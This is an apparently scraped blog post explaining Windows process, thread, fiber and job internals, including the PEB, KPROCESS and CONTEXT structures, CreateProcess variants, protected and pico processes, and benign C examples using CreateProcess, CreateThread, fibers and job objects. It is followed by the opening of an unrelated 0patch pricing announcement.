There are new articles available, click to refresh the page.
Before yesterdayReverse Engineering

A deep dive into Processes, Threads, Fibers and Jobs on Windows.

3 August 2022 at 05:00
By: Mr. Rc

Learning how processes and threads work is a crucial part of understanding any Operating System as they are the building block on top of which almost all of the user-mode mechanisms work. Additionally, Windows offers us an elegant API that enables us to interact with them. Unsurprisingly enough, these topics can be a bit complicated to understand since Microsoft does not has a clear documentation of them and there are not a lot of resources that cover these topics clearly. Windows also provides us the fiber and job APIs which are built on top of the process and thread APIs to allow the developers to manage processes and threads “easily”.

Table of contents:


Many people assume that a program and a process are the same. However, a process is not same as a program. A program is simply a file containing code. On the other hand, a process is a container of threads and various resources that are required for the threads inside the process to execute.
A process is a kernel object.

Process resources

The resources that are required to run a process might differ for each process according to it’s need but these are the fundamental components that every (almost) process has:
Process Identifier: Process identifier (aka PID or process ID) is a unique identifier for each process on the system. While processes with same name can exist on the system, process with same process IDs can not.

Private Virtual Address Space: A specific amount of virtual addresses that a process can use. This amount is different for different systems. I’ve previously wrote a detailed post about Virtual Memory which can be found here.

Executable Code: This refers to the code that is mapped into the private virtual address space (“stored in process’s memory”) of the process from the program. Processes can and do exist without any executable code for special purposes.

Handle Table: A Handle table contains all the pointer to the actual objects in the kernel that are being used by the process. The handles returned by the APIs are essentially the indexes inside the handle table. This table can not be accessed from the user-mode, since it is stored in the kernel mode. Another thing to note here is that this handle table only consists of handles for kernel objects and not for any other category of object, i.e. GDI and user.

Access Token: Each process also has an access token that defines it’s security context which is used by the system to check identity information such as which process belongs to which user, what are the privileges that it has, etc.

Process Environment Block: PEB is a user-mode per process structure that contains quite a lot of information about a process, such as the arguments provided to this process, if it’s being debugged or not, list of loaded modules, etc.
This is how the PEB looks like:

struct _PEB {
    0x000 BYTE InheritedAddressSpace;
    0x001 BYTE ReadImageFileExecOptions;
    0x002 BYTE BeingDebugged;
    0x003 BYTE SpareBool;
    0x004 void* Mutant;
    0x008 void* ImageBaseAddress;
    0x00c _PEB_LDR_DATA* Ldr;
    0x010 _RTL_USER_PROCESS_PARAMETERS* ProcessParameters;
    0x014 void* SubSystemData;
    0x018 void* ProcessHeap;
    0x01c _RTL_CRITICAL_SECTION* FastPebLock;
    0x020 void* FastPebLockRoutine;
    0x024 void* FastPebUnlockRoutine;
    0x028 DWORD EnvironmentUpdateCount;
    0x02c void* KernelCallbackTable;
    0x030 DWORD SystemReserved[1];
    0x034 DWORD ExecuteOptions:2; // bit offset: 34, len=2
    0x034 DWORD SpareBits:30; // bit offset: 34, len=30
    0x038 _PEB_FREE_BLOCK* FreeList;
    0x03c DWORD TlsExpansionCounter;
    0x040 void* TlsBitmap;
    0x044 DWORD TlsBitmapBits[2];
    0x04c void* ReadOnlySharedMemoryBase;
    0x050 void* ReadOnlySharedMemoryHeap;
    0x054 void** ReadOnlyStaticServerData;
    0x058 void* AnsiCodePageData;
    0x05c void* OemCodePageData;
    0x060 void* UnicodeCaseTableData;
    0x064 DWORD NumberOfProcessors;
    0x068 DWORD NtGlobalFlag;
    0x070 _LARGE_INTEGER CriticalSectionTimeout;
    0x078 DWORD HeapSegmentReserve;
    0x07c DWORD HeapSegmentCommit;
    0x080 DWORD HeapDeCommitTotalFreeThreshold;
    0x084 DWORD HeapDeCommitFreeBlockThreshold;
    0x088 DWORD NumberOfHeaps;
    0x08c DWORD MaximumNumberOfHeaps;
    0x090 void** ProcessHeaps;
    0x094 void* GdiSharedHandleTable;
    0x098 void* ProcessStarterHelper;
    0x09c DWORD GdiDCAttributeList;
    0x0a0 void* LoaderLock;
    0x0a4 DWORD OSMajorVersion;
    0x0a8 DWORD OSMinorVersion;
    0x0ac WORD OSBuildNumber;
    0x0ae WORD OSCSDVersion;
    0x0b0 DWORD OSPlatformId;
    0x0b4 DWORD ImageSubsystem;
    0x0b8 DWORD ImageSubsystemMajorVersion;
    0x0bc DWORD ImageSubsystemMinorVersion;
    0x0c0 DWORD ImageProcessAffinityMask;
    0x0c4 DWORD GdiHandleBuffer[34];
    0x14c void (*PostProcessInitRoutine)();
    0x150 void* TlsExpansionBitmap;
    0x154 DWORD TlsExpansionBitmapBits[32];
    0x1d4 DWORD SessionId;
    0x1d8 _ULARGE_INTEGER AppCompatFlags;
    0x1e0 _ULARGE_INTEGER AppCompatFlagsUser;
    0x1e8 void* pShimData;
    0x1ec void* AppCompatInfo;
    0x1f0 _UNICODE_STRING CSDVersion;
    0x1f8 void* ActivationContextData;
    0x1fc void* ProcessAssemblyStorageMap;
    0x200 void* SystemDefaultActivationContextData;
    0x204 void* SystemAssemblyStorageMap;
    0x208 DWORD MinimumStackCommit;

Thread: Thread is the entity inside a process that executes code. Every process starts with at least one thread of execution, this thread is called the primary thread. A process without threads can exist, but again, it’s mostly of times it’s of no use since it is not running any code.

EPROCESS structure: The EPROCESS (Executive Process) data structure is the kernel’s representation of the process object. The structure is huge and it contains every possible bit of information related to a process, such as pointers to other data structure, values of different attributes, etc. This structure is not documented by Microsoft.
The structure is very big in size so I’m not including it but it can be found here

KPROCESS structure: One of the most interesting structure inside the EPROCESS data structure is the KPROCESS (Kernel Process) data structure. This data structure also contains a lot of information about the process, such as pointer to process’s page directory, how much time the threads of the process has consumed in the user and kernel-mode, etc. Just like it EPROCESS, this structure is also not documented.
The structure looks like this:

struct _KPROCESS {
  struct _DISPATCHER_HEADER Header;
  struct _LIST_ENTRY ProfileListHead;
  unsigned int DirectoryTableBase;
  unsigned long Asid;
  struct _LIST_ENTRY ThreadListHead;
  unsigned long ProcessLock;
  unsigned long Spare0;
  unsigned int DeepFreezeStartTime;
  struct _KAFFINITY_EX Affinity;
  struct _LIST_ENTRY ReadyListHead;
  struct _SINGLE_LIST_ENTRY SwapListEntry;
  struct _KAFFINITY_EX ActiveProcessors;
  long AutoAlignment : 1;
  long DisableBoost : 1;
  long DisableQuantum : 1;
  unsigned long DeepFreeze : 1;
  unsigned long TimerVirtualization : 1;
  unsigned long CheckStackExtents : 1;
  unsigned long SpareFlags0 : 2;
  unsigned long ActiveGroupsMask : 20;
  long ReservedFlags : 4;
  long ProcessFlags;
  char BasePriority;
  char QuantumReset;
  unsigned int Visited;
  union _KEXECUTE_OPTIONS Flags;
  unsigned long ThreadSeed[20];
  unsigned int IdealNode[20];
  unsigned int IdealGlobalNode;
  union _KSTACK_COUNT StackCount;
  struct _LIST_ENTRY ProcessListEntry;
  unsigned int CycleTime;
  unsigned int ContextSwitches;
  struct _KSCHEDULING_GROUP *SchedulingGroup;
  unsigned long FreezeCount;
  unsigned long KernelTime;
  unsigned long UserTime;
  void *InstrumentationCallback;

This diagram shows the components of a process:


Threads are the actual entities inside a process that are running code on the CPU. Threads can execute any part of the code. A process provides all the resources that threads require to complete their task. Without threads, a process can’t run any code. A process can have multiple threads and such processes are called multi-threaded processes.

Thread scheduling

When there are multiple threads on the system, the scheduler switches between different threads and creates an illusion that all the threads running in parallel. While what’s really happening is that the scheduler is switching between different threads so quickly that it appears that the threads are running in parallel.
The amount of time for which a thread can run on a CPU before it switches is called the thread’s quantum. This quantum is a value that is set by the scheduler. This is usually set to a value that is a multiple of the processor’s clock speed.
Windows uses priority based thread scheduling model where the scheduler uses the thread’s priority to determine which thread should run next. The priority of a thread is a value that is set by the thread’s creator or by the system.
Because this system is quite complex, I will not go over it in detail here.

Thread resources

While a process provides a fair amount of resources for threads to run, there are still a few things that threads need in order to execute, these include:

Context: Every thread has a context which is a user-mode per thread data structure (managed by kernel) that contains the state of all the registers from the time the thread was last executed on the CPU. This data structure is very important because there can’t be multiple threads running on a CPU, so Windows switches between different threads after a few moments and each time it switches a thread, it stores the current CPU registers’ state in the context. This context is loaded again into as the values of the registers when the thread resumes it’s execution on the CPU. Since this data structure stores information related to registers, it’s processor-specific.
This is the how the data structure looks like for x64 machines:

typedef struct _CONTEXT {
  DWORD64 P1Home;
  DWORD64 P2Home;
  DWORD64 P3Home;
  DWORD64 P4Home;
  DWORD64 P5Home;
  DWORD64 P6Home;
  DWORD   ContextFlags;
  DWORD   MxCsr;
  WORD    SegCs;
  WORD    SegDs;
  WORD    SegEs;
  WORD    SegFs;
  WORD    SegGs;
  WORD    SegSs;
  DWORD   EFlags;
  DWORD64 Dr0;
  DWORD64 Dr1;
  DWORD64 Dr2;
  DWORD64 Dr3;
  DWORD64 Dr6;
  DWORD64 Dr7;
  DWORD64 Rax;
  DWORD64 Rcx;
  DWORD64 Rdx;
  DWORD64 Rbx;
  DWORD64 Rsp;
  DWORD64 Rbp;
  DWORD64 Rsi;
  DWORD64 Rdi;
  DWORD64 R8;
  DWORD64 R9;
  DWORD64 R10;
  DWORD64 R11;
  DWORD64 R12;
  DWORD64 R13;
  DWORD64 R14;
  DWORD64 R15;
  DWORD64 Rip;
  union {
    XMM_SAVE_AREA32 FltSave;
    NEON128         Q[16];
    ULONGLONG       D[32];
    struct {
      M128A Header[2];
      M128A Legacy[8];
      M128A Xmm0;
      M128A Xmm1;
      M128A Xmm2;
      M128A Xmm3;
      M128A Xmm4;
      M128A Xmm5;
      M128A Xmm6;
      M128A Xmm7;
      M128A Xmm8;
      M128A Xmm9;
      M128A Xmm10;
      M128A Xmm11;
      M128A Xmm12;
      M128A Xmm13;
      M128A Xmm14;
      M128A Xmm15;
    DWORD           S[32];
  M128A   VectorRegister[26];
  DWORD64 VectorControl;
  DWORD64 DebugControl;
  DWORD64 LastBranchToRip;
  DWORD64 LastBranchFromRip;
  DWORD64 LastExceptionToRip;
  DWORD64 LastExceptionFromRip;

Two stacks: Every thread has two stacks, a user-mode stack and a kernel-mode stack. The user-mode stack is used for normal purposes, such as for storing the values of variables. Unsurprisingly, the kernel stack is not accessible from the user-mode and it’s used as security mechanism.
When a threads calls a syscall, all of the arguments provided to that syscall are copied from the thread’s user-mode stack to it’s kernel-mode stack. It is done this way because after a thread uses a syscall, the CPU switches to the kernel mode and then the kernel-mode code validates those arguments to see if all the pointers, structures, etc that are passed are valid or not and since this stack is not accessible from the user-mode, a thread can not manipulate the arguments after they have been validated and this way, having two stacks works as a strong security measure.

Thread Local Storage: The thread local storage is a data structure that is used to store data that is specific to each thread. This data is stored in the thread’s context and is not shared between threads.

Thread ID: Just like every process has a unique identifier, every thread also has a unique identifier called a thread ID (TID).

Thread Environment Block: Like processes, threads also have most of their information stored in a data structure called the Thread Environment Block (TEB). This structure contains information such as pointer to the TLS, the LastErrorValue (this has to be this way because if two threads called GetLastError and one thread gets the LastErrorValue of some other thread then it can lead to total chaos), pointer to PEB, etc. TEB is also not documented by Microsoft.
This structure can be found here

Affinity: Setting affinity for a thread forces Windows to run a thread only on a specific CPU. For example, let’s say your machine has for CPU and you set the affinity of process linux.exe to CPU 3 then that thread will only run on CPU 3 until it finishes execution or it’s affinity is changed.

ETHREAD structure: The ETHREAD structure (Executive Thread) is the kernel representation of the thread object. Similar to EPROCESS, this structure also contains every possible bit of information about a thread, such as a pointer to the PEB, LastErrorValue, if this thread is the initial thread (main thread) of the process or not, etc. This structure is also not documented by Microsoft.
This structure can be found here

KTHREAD structure: The KTHREAD data structure (Kernel Thread) is also one of the important data structure inside ETHREAD data structure. It includes information such as the pointer to the kernel stack, a lot of information about it’s scheduling (when and for how long this thread will run on the CPU), pointer to TEB, how much time the thread has spent in the user-mode, etc. This structure is also not documented by Microsoft.
This structure can be found here

This diagram shows the components of a process:

Using Threads

Using threads is very simple. We just need to create a thread using the CreateThread function. The thread will start executing at the address of the specified function.
The function that we want to run in the thread is called the thread’s entry point. The entry point is the function that is called when the thread is created.

Here’s the signature of the CreateThread function:

HANDLE CreateThread(
  [in, optional]  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
  [in]            SIZE_T                  dwStackSize,
  [in]            LPTHREAD_START_ROUTINE  lpStartAddress,
  [in, optional]  __drv_aliasesMem LPVOID lpParameter,
  [in]            DWORD                   dwCreationFlags,
  [out, optional] LPDWORD                 lpThreadId

The first parameter is the security attributes. This is a pointer to a SECURITY_ATTRIBUTES structure that contains information about the security of the thread. This is optional and can be NULL for default security.
The second parameter is the stack size. This is the size of the stack that the thread will use. This is optional and can be 0 for default stack size.
The third parameter is the address of the function that will be executed in the thread. This is the entry point of the thread.
The fourth parameter is the parameter that will be passed to the thread. This is optional and can be NULL for no parameter.
The fifth parameter is the creation flags. This is a set of flags that determines how the thread will be created. This is optional and can be 0 if we want the thread to directly execute after being created.
The sixth parameter is the thread ID. This is a pointer to a variable that will receive thread ID after it’s created. This is optional and can be NULL if we do not want to store the thread’s ID.


Fibers are unit of execution that allow us to manually schedule (define our own scheduling algorithm) them rather than being automatically scheduled by the scheduler. Fibers run in the context of the threads that created them. Every thread can have multiple fibers and a thread can run one fiber at a time (we decide which). Fibers are often called lightweight threads.
Fibers are invisible to the kernel as they are implemented in the user-mode in Kernel32.dll.

Using Fibers

The first step when using fiber is to convert our own thread into a fiber. This is done by calling the ConvertThreadToFiber function. This is the signature for the function:

LPVOID ConvertThreadToFiber(
  [in, optional] LPVOID lpParameter

This function returns the memory address of the fiber’s context that was created. This address is useful later when performing operations on the fiber. The fiber’s context is similar to than that of a thread but it has a few more elements than just registers, these include:

  • The value of lpParameter that was passed to ConvertThreadToFiber.
  • The top and bottom memory addresses of the fiber’s stack.
    and more.

After this function is called our thread gets converted into a fiber and it starts running on our thread. This fiber may exit either when it’s done executing or when it calls ExitThread (in this case, the thread and fiber both get terminated).

Now, to create a fiber, we need to call the CreateFiber function. This is the signature for the function:

LPVOID CreateFiber(
  [in]           SIZE_T                dwStackSize,
  [in]           LPFIBER_START_ROUTINE lpStartAddress,
  [in, optional] LPVOID                lpParameter

The first argument is used to specify the size of the fiber’s stack, generally, 0 is specified, which uses the default value and creates a stack that can scale grow up to 1 MB. The second argument is the address of the function that will be executed when the fiber is scheduled. The third argument is the parameter that will be passed to the function that will be executed.
This function also returns the memory address of the fiber’s context that was created with this context having one additional element: the address of the function that will be executed.
Remember that calling this function only creates the fiber and doesn’t start it. To start the fiber, we need to call the SwitchToFiber function. This is the signature for the function:

void SwitchToFiber(
  [in] LPVOID lpFiber

This function takes only one argument, the address of the fiber’s context that was previously returned by CreateFiber. This function actuall starts the execution of the fiber.

To destroy a fiber, we need to call the DeleteFiber function. This is the signature for the function:

void DeleteFiber(
  [in] LPVOID lpFiber

It only takes one argument, the address of the fiber’s context that we want to delete.

CreateProcess internals

Usually, when a thread wants to create another process, it calls the Windows API function CreateProcess and specifies the parameters accordingly to create a process with required attributes. This function is takes a lot of arguments and is quite flexible and can be used in almost all cases.
However, sometimes the capabilities of this functions are not enough so other functions (sometimes just a wrapper of this function) are used, here are some of them:

  • CreateProcessAsUser allows you to create a process on the behalf another user by allowing you to specify the handle to that user’s primary token.
  • CreateProcessWithTokenW gives you the same capabilities as the previous function but this one just requires a few different privileges.
  • CreateProcessWithLogonW allows you to provide the credentials of the user in whose context you want to create a process.
  • ShellExecute is a very unique function. All the previous functions that we talked about work with any valid Portable Executable (PE) file and they do not care about the file extension of the file that you specified, i.e, you can rename the original notepad.exe to notepad.txt and give it to any of those functions and they would still create a process from it.
    However, the ShellExecute and ShellExecuteEx are a bit different. These functions accept any file format and then they look inside the HKLM\SOFTWARE\Classes and HKCU\SOFTWARE\Classes registry keys to find the program which is associated with the file format of the file you gave it as an argument and then they eventually call the CreateProcess function with the appropriate executable name/path along with the file name appended, for example you can provide this function a txt file and it will launch notepad with the filename as an argument (notepad.exe filename.txt).

CreateProcess and CreateProcessAsUser both are exported by Kernel32.dll and both of them eventually call CreateProcessInternal (also exported by Kernel32.dll) which also ends up calling the NtCreateUserProcess function which is exported by ntdll.dll. NtCreateUserProcess is the last part of the user-mode code of all user-mode process creation functions, after this function is done with it’s work, it makes a syscall and transforms into kernel mode. Both CreateProcessInternal and NtCreateUserProcess are officially undocumented by Microsoft at the time of writing this post.
However, the CreateProcessWithTokenW and CreateProcessWithLogonW functions are exported by Advapi32.dll. Both of these functions make a Remote Procedure Call (RPC) to the Secondary Login Service (seclogon.dll hosted in svchost.exe), this service allows processes to be started with different user’s credentials and then Secondary Logon Service executes this call in its SlrCreateProcessWithLogon function which eventually calls CreateProcessAsUser.


The arguments for all the CreateProcess* functions are almost completely similar with a only a few differences. The explanation of all the CreateProcess* functions would be tedious to write as well as very boring to read, so here is the brief overview of the description of different arguments:

  • The first argument for CreateProcessAsUser and CreateProcessWithTokenW are the handle to the token under which the process will be started. However, in the case of CreateProcessWithLogonW, the first arguments include the username, domain and password of the user on whose behalf the process will be started.
  • The next important argument lpApplicationName, which is the full path to the executable to run. This argument can be left NULL and instead the next argument can be used.
  • The next argument after lpApplicationName is lpCommandLine. This argument doesn’t require us to put the provide the full path of the executable we want create a process of (we can provide it full path but it’s optional), the reason behind this is that when we provide it an executable’s name without a path in this argument, the function searches through several pre-defined paths in an order to find that file’s path. This is the order defined in msdn:

  • The next important arguments are lpProcessAttributes and lpThreadAttributes. Both of them take a pointer to SECURITY_ATTRIBUTES structure and both of them can be NULL, and when this argument is specified NULL then the default security attributes are used. we can specify whether we want to make the handle of the process that is about to be created (in lpProcessAttributes) and it’s primary thread (in lpProcessAttributes) inheritable by all the other child processes that the caller of CreateProcess* creates or not in the bInheritHandle member of SECURITY_ATTRIBUTES.
  • The next important argument is bInheritHandles. This argument specifies whether we want the process that is about to be created to inherit all the inheritable handles from the handle table of the parent process or not.
  • The next important argument is dwCreationFlags. This argument allow us to specify different flags that affect the creation of the process, such as:
    • CREATE_SUSPENDED: The initial thread of the process being created is started in suspended state (paused state, it doesn’t directly run after it’s created). A call to ResumeThread can be used thereafter to resume the execution of the thread.
    • DEBUG_PROCESS: The calling process declares itself as a debugger and creates the process under it’s control.
  • The next argument is lpEnvironment. This argument is optional and is used to provide a pointer to the an environment variables’ block. Since it’s optional, we can specify it NULL and it will inherit it’s environment variables from it’s parent process.
  • The next argument is lpCurrentDirectory. This argument is also optional and is used if we want the process about to be created will have a different current directory than the parent process. If left NULL, the new process will use the current directory of the parent process.
  • The next argument is lpStartupInfo. This argument is used to specify a pointer to STARTUPINFO or STARTUPINFOEX structures. The STARTUPINFO structure contains some more configuration related for the new process. STARTUPINFOEX structure has an extra field which is used to specify some more attributes for the new process.
  • The last argument is lpProcessInformation. This argument is used to specify a pointer to PROCESS_INFORMATION structure. The CreateProcess* functions returned the information of the new process in this structure, this information includes the process id of the new process, the thread id of the primary thread, a handle to the new process, etc.

Classification of Processes

Windows provides some (almost) completely different attributes for processes that require extra security or have a special purpose. These processes are not launched like normal processes and they also have different attributes.

Protected Processes

The concept of protected processes was initially introduced to imply with Digital Rights Management (DRM) requirements which were imposed by the media industry for protection of content such as HD-DVD media.
Normally, threads of any process which as debug privilege (usually processes started by the administrator account) could read or write data and code into the memory of any process running on the system. This behavior is very useful in a lot of cases. However, this behavior violates the DRM requirements and for this reason, Windows uses protected processes.
These process exist with normal Windows process, but they provide with little to no access to other processes on the system (even the one’s running with administrator privileges).
These processes can be created by any application on the system with whatever rights they have, but for an executable to be able to run as a protected process, it must be signed with a special Windows Media Certificate. This certificate is a digital signature that is used to identify the executable as a protected process.
These process also only load DLLs that are signed with a special certificate and the data of these processes are only accessible to either kernel or other protected processes.
Examples of protected process are:

  • The Audio Graph Device process (Audiodg.exe) that is used by Windows to decode protected DRM audio content.
  • The Media Foundation Protected Media Path (Mfpmp.exe) process used by Windows to decode DRM video content.
  • The Windows Error Reporting (WER, Werfaultsecure.exe) for reporting crashes of protected apps. This the protected version of WER is required because the normal WER process executes as a normal process and therefore it can’t access the data inside the crashed protected processes.
  • The system process.

Protected Processes Light (PPL)

PPL is the extended version of Protected Processes introduced allow third party processes, such as Antivirus programs to have same privileges as protected processes. However, PPLs comes with a slight difference, i.e., how much protected a PPL will be depends upon it’s signature, which results in some PPLs having more or less protection than others.
Most system processes on Windows are PPL protected, such as smss.exe, csrss.exe, services.exe, etc.

Minimal Processes

These are essentially empty processes. These processes have empty user-mode address space, ntdll.dll or other subsystem DLLs are not loaded, no PEB or TEB or any related structure are created, no initial thread is created and no executable image is mapped. There processes are created and managed by the kernel and the kernel provides no way to create such processes from the user-mode since these are not meant to be used by the user, but rather by the system to perform special tasks.
These process can have threads and these threads are called minimal threads. These threads don’t have any Thread Environment Block (TEB) or stack.

An example of this is the memory compression process which stores compressed memory of active processes, this process is used to keep more processes memory without paging them out to the disk (this process is hidden from task manager because since it stores compressed memory, it has a lot of memory usage and average users used to get suspicious about this process). You can view this process in process explorer, if you just sort the processes by their working set (amount of physical memory currently being used), this process should appear on top (it might not, if you have some program eating so much of your ram). This process also has no threads or code.

Pico Processes

Windows introduced the concept of pico processes based on their research called the Project Drawbridge. These are minimal processes with a supporting driver called the pico provider. This driver can manage almost everything related to the execution of the pico process it’s managing and this property of pico providers allow them it can act like a separate kernel for that process without the process having any sense of the original system it’s running on, however, the management of memory, I/O and thread scheduling is still done by the original Windows kernel.
A pico provider is able to intercept all the operations that of the pico process that require any handling by the kernel, this includes things such as system calls, exceptions, etc and respond accordingly.
Pico processes can have pico threads (minimal threads for pico processes) and also normal threads. The pico threads also have a context which is stored in the PicoContext member of ETHREAD structure.

Windows Subsystem for Linux

The Windows Subsystem for Linux (WSL) is built on this idea of pico processes. WSL is able to run whole linux system nearly perfectly on Windows without having a single line of code from the linux kernel. This is made possible by the incredible control that pico providers allow.
The pico providers for WSL are lxss.sys and lxcore.sys. These drivers emulate the behavior of the linux kernel by converting all the linux syscalls made from the WSL pico process to NT APIs or by calling specific components that are implemented from scratch.
This implementation of WSL on Windows is a very interesting topic and complicated topic, I might cover it later in some other blog post!

Trustlets (Secure Processes)

Trustlets are another type of processes that provide strong security. Trustlets can not be directly created by the user. They are created by the Windows kernel when a user-mode application requests to create a secure process.
Trustlets use Virtual Trust Levels provided by Hyper-V Hypervisor to isolate themselves in the system. These levels are used to provide the security of the trustlet. The trustlet can only import DLLs that are signed with a certificate that is trusted by the system and other system trusted DLLs such as C/C++ runtime libraries, Kernelbase, Advapi, RPC runtime, CNG base Crypto, and other mathematical libraries that do no require any syscall to work.
The way truslets work is a bit complex as it requires the understanding of how Hypervisors work so I am not covering that here. However, you can read more about them here on msdn.


Jobs are a Windows mechanism to group and manage processes together and have them share the same security context. This can be used to run a bunch of processes that are related to each other, for example if you want to manage multiple processes that are the part of same application.
Jobs are shareable, securable and nameable. Any change to the job will affect all the processes in the job. Jobs are used to impose limits on a set of processes, for example if you want to limit the number of processes of an application that can be running at the same time.
Once a process is assigned to a job, it can not leave that job. Child processes created by the processes inside a job will also be a part of that job unless CREATE_BREAKAWAY_FROM_JOB was specified to CreateProcess and the job itself allows processes to break out from it (a job can deny processes inside it from breaking out of it).

Job limits

Here are few of the limits that we can set in a job:

  • Max active processes: This is used to limit the amount of processes that can exist in a job. When this limit is reached, no new processes are allowed to assign to that job and creation of child processes is blocked.
  • Processor Affinity: This is used to limit all the processes inside a job to only on a specific CPU.
  • Priority Class: This is used to set the priority class for all the members of a job. If the thread of any process that is the member of a job that has it’s priority class set tries to increase it’s priority class, it’s request will be ignored and no error will be returned (to SetThreadPriority).
  • Virtual Memory Limit: This is used to restrict the maximum amount of virtual memory that can be committed by single processes or the entire job.
  • Clipboard R/W: This is used to disallow all the members of a job from accessing or writing to the clipboard.

API functions for working with Jobs

The Windows API provides us all the important functions that are required to manage and work with job objects. Here are few of the important functions:

  • CreateJobObject: Used to create a job object. It can also be used to open a job object.
  • OpenJobObject: Used to open an already existing job object.
  • AssignProcessToJobObject: Used to assign a process to a job object.
  • SetInformationJobObject: Used to set limits for the processes inside a job object.
  • QueryInformationJobObject: Used to retrieve information about the a job object.
  • TerminateJobObject: Used to terminate all the processes inside a job object.
  • IsProcessInJob: Used to check if a process is a member of a job object.

Using Jobs

Working with jobs is also quite simple. You can create a job object, assign processes to it and set limits on the processes inside the job. You can also use the API functions to query and set the limits on the processes inside the job.
To create a job object, you can use the CreateJobObject function. This function returns a handle to the job object. Here is the function signature:

HANDLE CreateJobObjectA(
  [in, optional] LPSECURITY_ATTRIBUTES lpJobAttributes,
  [in, optional] LPCSTR                lpName

The lpJobAttributes parameter is a pointer to a SECURITY_ATTRIBUTES structure that can be used to set the security attributes for the job object. It can be NULL if you want the job object to have default security attributes.
The lpName parameter is a pointer to a string that can be used to name the job object. This parameter can also be NULL which will result in the job object being unnamed. If the name matches the name of an existing mutex, file-mapping object or waitable object, the function will fail.

After creating an empty job object, you can assign processes to it. To do this, you can use the AssignProcessToJobObject function. Here is the function signature:

BOOL AssignProcessToJobObject(
  [in] HANDLE hJob,
  [in] HANDLE hProcess

The hJob parameter is a handle to the job object.
The hProcess parameter is a handle to the process that you want to assign to the job object.
To get the handle of the current process, you can use the GetCurrentProcess function.

To set the limits on the processes inside the job, you can use the SetInformationJobObject function. Here is the function signature:

BOOL SetInformationJobObject(
  [in] HANDLE             hJob,
  [in] JOBOBJECTINFOCLASS JobObjectInformationClass,
  [in] LPVOID             lpJobObjectInformation,
  [in] DWORD              cbJobObjectInformationLength

The hJob parameter is a handle to the job object.
The JobObjectInformationClass parameter is a value that specifies the type of information that you want to set. The next parameter is used to specify the actual information that you want to set.
The lpJobObjectInformation parameter is a pointer to the structure containing information that you want to set.

Code Examples

Now that you know the basics of working with processes, jobs, threads and fibers let’s see some code examples.

Creating a Process

Let’s start by looking at how to create a process.

#include <stdio.h>
#include <windows.h>

int main(){

    ZeroMemory( &si, sizeof(si) );
    si.cb = sizeof(si);
    ZeroMemory( &pi, sizeof(pi) );
    LPSTR lpCommandLine = "notepad.exe";

    // Start the child process. 
    if( !CreateProcessA( NULL,   // No module name (use command line)
        lpCommandLine,        // Command line
        0,           // Process handle not inheritable
        0,           // Thread handle not inheritable
        0,          // Set handle inheritance to FALSE
        0,              // No creation flags
        0,           // Use parent's environment block
        0,           // Use parent's starting directory 
        &si,            // Pointer to STARTUPINFO structure
        &pi )           // Pointer to PROCESS_INFORMATION structure
        printf( "CreateProcess failed (%d).\n", GetLastError() );
        return -1;
    printf("Process Created!\n");

    // Sleep for 5 seconds

    // Close process and thread handles. 
    CloseHandle( pi.hProcess );
    CloseHandle( pi.hThread );

    return 0;

This code should open notepad.exe and exit after 5 seconds.
Process creation is pretty easy, you just need to know the name of the executable and the command line arguments if you want to pass any.

Creating a Thread

Now that you know how to create a process, let’s look at how to create a thread.

#include <stdio.h>
#include <windows.h>

// Function to create a thread
int EthicalFunction(LPVOID lpParam)
    // Print a message
    printf("Thread created\n");
    printf("For educational purposes only*\n");
    // Return success
    return 0;

int main()
    // Create a thread
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)EthicalFunction, NULL, 0, NULL);
    // Wait for thread to finish
    WaitForSingleObject(hThread, INFINITE);
    printf("Thread returned\n");
    // Close thread handle
    // Return success
    return 0;

This code is creating a thread for the EthicalFunction function and waiting for it to finish and then exiting after printing a message.
You can create multiple threads for multiple functions like this, for example if you want to create a thread a background thread that runs in the background and does not block the main thread until it is finished with its work.

Creating a Fiber

Next, let’s look at how to create a fiber.

#include <stdio.h>
#include <windows.h>

// fiber function
void fiber_function(void* lpParam)
    // Print a message
    printf("Fiber created\n");
    printf("For educational purposes only*\n");
    // Converting back into the main thread as fiber will not return to the main thread by itself


// main function
int main()
    // Converting thread to fiber
    LPVOID Context = ConvertThreadToFiber(NULL);
    // Creating fiber
    LPVOID lpFiber = CreateFiber(0, (LPFIBER_START_ROUTINE)fiber_function, Context);
    // Switching to fiber (executing fiber function)
    // Printing a message
    printf("Fiber returned\n");
    // Deleting fiber
    // Return success
    return 0;

This code will create a fiber and execute it and then switch back to the main thread and the main thread will print a message and delete the fiber.

Creating a Job Object

Let’s look at how to create a job object and assign a processes to it.

#include <stdio.h>
#include <windows.h>

int main()
    // Creating a job with default security attributes
    HANDLE hJob = CreateJobObject(NULL, "Unemployed");
    // Setting the job to terminate when all processes in it terminate
    jeli.BasicLimitInformation.LimitFlags = JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE;
    SetInformationJobObject(hJob, JobObjectExtendedLimitInformation, &jeli, sizeof(jeli));
    // Creating structures for notepad, cmd and powershell
    STARTUPINFOA si = {0};
    si.cb = sizeof(si);
    STARTUPINFOA si1 = {0};
    si1.cb = sizeof(si1);

    // Creating notepad, and Windows media player in suspended state and adding them to the job and checking for errors
    if (!CreateProcessA(NULL, (LPSTR)"notepad.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi) || !CreateProcessA(NULL, (LPSTR)"dvdplay.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si1, &pi1))
        printf("Error creating processes\n");
        printf("Error code: %d\n", GetLastError());
        return 1;
    AssignProcessToJobObject(hJob, pi.hProcess);
    AssignProcessToJobObject(hJob, pi1.hProcess);

    // Resuming processes
    printf("Job created and processes added!\n");
    // SLeeping for 1 minutes to let the processes run
    // Terminating the job
    TerminateJobObject(hJob, 0);
    // Closing handles

    // Return success
    return 0;

This code will create a job object named Unemployed and add two notepad and Windows Media Player processes to it and then terminate the job after 1 minutes.
To confirm that the processes are running inside the Unemployed job, you can use Process Explorer to view the Properties -> Job of either notepad.exe or wmplayer.exe (not dvdplay.exe as it immediately launches this as the child process, it can also be setup_wm.exe if you do not have your Windows Media Player setup).
Here’s an example image:


This post covered an overview of the internals of processes, threads, fibers and jobs as well the classification of processes into different types. We also looked at the different components of a process. Later, we looked at how to create a process, thread, fiber and job objects.
I hope you enjoyed this post and found it useful.
Thank you for reading!


Changes in 0patch Pricing For New Subscriptions Coming in August

27 July 2022 at 09:21

Over the years, 0patch has evolved from a simple proof-of-concept into a production-grade security service protecting computers around the World. We've been adding features and improving reliability, we have developed tools and processes to speed up vulnerability analysis and patch development, and we still have many ideas and plans to implement.

